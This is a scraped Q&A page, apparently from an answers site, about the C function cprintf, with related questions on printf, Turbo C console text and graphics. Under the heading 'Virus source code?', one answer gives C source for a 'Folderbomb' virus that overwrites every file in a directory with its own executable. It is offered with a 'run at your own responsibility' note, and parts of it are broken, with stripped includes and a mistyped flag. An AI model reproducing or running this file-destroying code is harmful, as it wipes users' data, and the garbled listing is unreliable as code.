answersLogoWhite

0

What is cprintf in graphics?

User Avatar

Anonymous

12y ago
Updated: 8/20/2019

cprintf is to the console, printf to stdout (standard output). The only difference is stdout can be redirected but the console cannot.

User Avatar

Wiki User

12y ago

What else can I help you with?

Related Questions

What is cprintf?

A function in c langage that prints colored text one must use the heather file conio.h to use cprintf :)


What is the difference between cprintf and printf?

The printf function calls on fprintf to write the result of sprintf to standard output. That is:printf("%i\n", 42);is exactly equivalent to:fprintf(stdout, "%i\n", 42);


How do you write a turbo c program that will print on a screen Welcome to CSSAC Sipocot Campus?

#include #include void main (void) { time_t t, newt; int i = 0, x, y; time (&t); clrscr (); cprintf ("Hit any key to continue: "); x = wherex (); y = wherey (); // Wait for a keypress, flashing the message // "I'm waiting!" on and off once per second. // After any key is hit, display "Welcome to CSSAC Sipocot Campus" while (!kbhit ()) { time (&newt); if (t != newt) { t = newt; i++; if (0 == (i & 1)) cprintf ("I\'m waiting!"); clreol (); gotoxy (x, y); } } getch (); cprintf ("\r\n"Welcome to CSSAC Sipocot Campus"\r\n"); }


Write Procedure to implement highlight as a blinking operation?

Blinking text in DOS, compiled with Turbo C #include int main() { int color; textattr(128 + 10); cprintf("This is blinking text\n"); return 0; }


Is graphics a verb?

No. Graphics is not a verb.


What is meta graphics?

what is meta graphics?


Where can you get star graphics?

You can get some star graphics from deviantart.com Also you can get other graphics as well.


Virus source code?

If you're talking about viruses on your computer, No you cannot.Viruses are executables. The code in them is binary code- Machine language. You can't open it and expect to see the C code.There are many kinds of viruses. Anything which is harmful and/or self-propagating can be considered a virus and there are numerous ways on how to write the same program./*this is a simple program to create a virus in cit will create folder in a folder in a folder and so on run this on your own responsibility*/includeincludeincludeincludeincludevoid main(int argc,char* argv[]){ char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf("-------------------------"); printf("\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n"); cprintf("-------------------------"); done = findfirst("*.*",&ffblk,0); while (!done) { printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Folderbomb"); source=open(argv[0],O_RDONLY|O_BINARY); target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0) write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); }


What does bgi mean in graphics?

bgi in computer graphics means "borland graphics interface", these r the files which contains information about all the graphics funtion.


What is the difference between integrated graphics and a graphics card?

A graphics card plugs into your computer, integrated means the graphics chip is ready installed on the motherboard.


What is the Malayalam meaning of the English word graphics?

graphics means chithram in Malayalam in genaral...but if you mention computer graphics....it is said as computer graphics itself.


what is graphics monitor and workstation?

A graphic workstation is a workstation that is configured specifically for graphics work. It can include vector graphics, image manipulation, and bitmap graphics.